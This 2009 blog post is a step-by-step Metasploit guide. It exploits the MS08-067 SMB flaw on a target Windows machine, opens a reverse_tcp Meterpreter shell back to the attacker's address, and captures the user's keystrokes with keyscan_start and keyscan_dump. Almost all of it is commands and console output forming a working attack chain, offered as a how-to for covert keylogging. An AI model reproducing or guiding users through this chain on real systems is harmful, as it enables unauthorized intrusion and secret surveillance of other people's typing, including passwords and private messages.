Capturing Keystrokes With Metasploit

June 22, 2009 – 1:09 PM

I was contacted privately about this, so I thought I would post a step-by-step guide on how to capture keystrokes from a target machine using Metasploit.

Instead of posting a ton of screenshots, I will provide the commands in text below, step-by-step:

msf > use exploit/windows/smb/ms08_067_netapi (only an example – use whatever exploit the target machine is vulnerable to)
msf exploit(ms08_067_netapi) > set rhost 192.168.1.104 (target)
rhost => 192.168.1.104
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.106 (attacker)
lhost => 192.168.1.106
msf exploit(ms08_067_netapi) > set target 3
target => 3
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.104:1049)

meterpreter > keyscan_start
Starting the keystroke sniffer…

(target machine)

meterpreter > keyscan_stop
Stopping the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Top secret text.  Don’t tell my wife.
meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit
root@backtrack:/pentest/exploits/framework3#